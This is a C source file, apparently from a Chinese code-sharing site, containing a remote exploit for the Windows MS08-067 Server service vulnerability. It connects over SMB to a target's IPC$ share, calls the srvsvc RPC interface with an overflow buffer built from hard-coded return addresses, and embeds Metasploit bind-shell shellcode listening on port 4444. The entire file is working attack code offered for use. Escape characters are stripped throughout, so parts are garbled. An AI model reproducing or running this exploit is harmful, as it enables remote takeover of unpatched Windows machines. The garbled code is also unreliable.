MS08-067.c
上传用户:fsojjn
上传日期:2015-10-05
资源大小:12k
文件大小:6k
- #include <winsock2.h>
- #include <windows.h>
- #include <stdio.h>
- #include <io.h>
- #include <fcntl.h>
- #include <memory.h>
- #include <wchar.h>
- #include "srvsvc.h"
- #include "srvsvc_c.c"
- #include "mem.h"
- #pragma comment(lib,"ws2_32")
- #pragma comment(lib,"mpr")
- #pragma comment(lib,"rpcrt4.lib")
- #pragma comment(lib,"MSVCRT.LIB")
- DWORD dwRetAddr = 0x7ffa0eb8;
- DWORD dwJmpAddr = 0x7ffa0eb7;
- /* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
- unsigned char sc[] =
- "x83xECx70" // sub esp, 0x70
- "x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xad"
- "x07xe6x4ax83xebxfcxe2xf4x51x6dx0dx07x45xfex19xb5"
- "x52x67x6dx26x89x23x6dx0fx91x8cx9ax4fxd5x06x09xc1"
- "xe2x1fx6dx15x8dx06x0dx03x26x33x6dx4bx43x36x26xd3"
- "x01x83x26x3exaaxc6x2cx47xacxc5x0dxbex96x53xc2x62"
- "xd8xe2x6dx15x89x06x0dx2cx26x0bxadxc1xf2x1bxe7xa1"
- "xaex2bx6dxc3xc1x23xfax2bx6ex36x3dx2ex26x44xd6xc1"
- "xedx0bx6dx3axb1xaax6dx0axa5x59x8exc4xe3x09x0ax1a"
- "x52xd1x80x19xcbx6fxd5x78xc5x70x95x78xf2x53x19x9a"
- "xc5xccx0bxb6x96x57x19x9cxf2x8ex03x2cx2cxeaxeex48"
- "xf8x6dxe4xb5x7dx6fx3fx43x58xaaxb1xb5x7bx54xb5x19"
- "xfex54xa5x19xeex54x19x9axcbx6fxf7x16xcbx54x6fxab"
- "x38x6fx42x50xddxc0xb1xb5x7bx6dxf6x1bxf8xf8x36x22"
- "x09xaaxc8xa3xfaxf8x30x19xf8xf8x36x22x48x4ex60x03"
- "xfaxf8x30x1axf9x53xb3xb5x7dx94x8exadxd4xc1x9fx1d"
- "x52xd1xb3xb5x7dx61x8cx2excbx6fx85x27x24xe2x8cx1a"
- "xf4x2ex2axc3x4ax6dxa2xc3x4fx36x26xb9x07xf9xa4x67"
- "x53x45xcaxd9x20x7dxdexe1x06xacx8ex38x53xb4xf0xb5"
- "xd8x43x19x9cxf6x50xb4x1bxfcx56x8cx4bxfcx56xb3x1b"
- "x52xd7x8exe7x74x02x28x19x52xd1x8cxb5x52x30x19x9a"
- "x26x50x1axc9x69x63x19x9cxffxf8x36x22x42xc9x06x2a"
- "xfexf8x30xb5x7dx07xe6x4a";
- int MakeBuff(char *Buff,int BufLen);
- void Usage(char *ProgName);
- int WaitExit();
- #define CN 0
- #define TW 1
- void main(int argc, char *argv[])
- {
- NETRESOURCE lpNetResource;
- char Username[256] = {0};
- char Password[256] = {0};
- DWORD Ret = 0;
- RPC_STATUS status;
- unsigned char * pszUuid = NULL;
- unsigned char * pszProtocolSequence = "ncacn_np";
- unsigned char * pszNetworkAddress = "";
- unsigned char pszEndpoint[100] = "\pipe\browser";
- unsigned char * pszOptions = NULL;
- unsigned char * pszStringBinding = NULL;
- char Server[256] = {0};
- char RemoteName[256] = {0};
- char Buff[0x700];
- char Buff2[1000] = {0};
- char *pBuff2 = (char *)&Buff2;
- char Buff3[100] = {0};
- int BufLen = 0;
- // int i;
- int ForceAttack = 0;
- int AntiDEP = 0;
- int nLanguage = 0;
- DWORD dwID = 0;
- if(argc != 2)
- {
- Usage(argv[0]);
- return;
- }
- strcpy(Server,argv[1]);
- sprintf(RemoteName,"\\%s\IPC$",Server);
- pszNetworkAddress = Server;
- if(strlen(Server) == 0)
- {
- Usage(argv[0]);
- return;
- }
- printf("nMS08-067 Exploit for CN by EMM@ph4nt0m.orgnn");
- lpNetResource.dwScope=RESOURCE_CONNECTED;
- lpNetResource.dwType =RESOURCETYPE_DISK;
- lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
- lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
- lpNetResource.lpLocalName=NULL;
- lpNetResource.lpRemoteName = RemoteName;
- lpNetResource.lpComment=NULL;
- lpNetResource.lpProvider=NULL;
- Ret = WNetAddConnection2(&lpNetResource,Username,Password,CONNECT_UPDATE_PROFILE);
- if(Ret != NO_ERROR)
- {
- printf("Make SMB Connection error:%dn",GetLastError());
- return;
- }
-
- printf("SMB Connect OK!n");
- status = RpcStringBindingCompose(pszUuid,
- pszProtocolSequence,
- pszNetworkAddress,
- pszEndpoint,
- pszOptions,
- &pszStringBinding);
- if(status != RPC_S_OK)
- {
- return;
- }
- status = RpcBindingFromStringBinding(pszStringBinding,&srvsvc__MIDL_AutoBindHandle);
- if(status != RPC_S_OK)
- {
- return;
- }
- RpcTryExcept
- {
- func23(L"ph4nt0m",(wchar_t *)"x53x00x56x89x56x89x56x89x56x89",(wchar_t *)"x4Dx00x56x89x56x89",4,0);
- memset(Buff,0,sizeof(Buff));
- BufLen = MakeBuff(Buff,sizeof(Buff));
- CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)WaitExit,(LPVOID)NULL,0,&dwID);
- (DWORD)*(DWORD *)Buff3 = 1;
- func1f(L"EMM!",(wchar_t *)Buff,Buff2,1000,L"",(DWORD *)Buff3,1);
- }
- RpcExcept ( 1 )
- {
- status = RpcExceptionCode();
- if(status == 1726)
- {
- }
- else
- {
- printf("RpcExceptionCode() = %urn", status );
- return;
- }
- }
- RpcEndExcept
- //*/
- printf("Maybe Patched!n");
- RpcStringFree( &pszStringBinding );
- RpcBindingFree( &srvsvc__MIDL_AutoBindHandle );
- return;
- }
- #define JMPPOINT "B041"
- int MakeBuff(char *Buff, int BufLen)
- {
- int len = 0;
- char tmp[5] = {0};
- int i;
- for(i = 0; i < BufLen/4; i++)
- {
- memset(tmp,0,4);
- sprintf(tmp,"B%03d",i);
- //*
- if(memcmp(tmp,JMPPOINT,4) == 0)
- {
- break;
- }
- //*/
- memcpy(Buff + len,tmp,4);
- len += 4;
- }
- memcpy(Buff,L".\\a\..\..\NN",13*2);
- for(i = 0; i < 6; i++)
- {
- memcpy(Buff + len,&dwRetAddr,4);
- len += 4;
- }
-
- memcpy(Buff + len,&dwJmpAddr,4);
- len += 4;
- memset(Buff + len,0x48,0x4);
- len += 4;
- memcpy(Buff + len,sc,sizeof(sc) - 1);
- len += sizeof(sc) - 1;
- memcpy(Buff + len,"EMM!",4);
- len += 4;
- memset(Buff + 0x206 * 2,0,2);
- return len;
- }
- void Usage(char *ProgName)
- {
- printf("n MS08-067 Exploit for CN by EMM@ph4nt0m.orgnn %s <Server>nn",ProgName);
- return;
- }
- int WaitExit()
- {
- Sleep(1000 * 5);
- printf("Send Payload Over!n");
- ExitProcess(0);
- return 0;
- }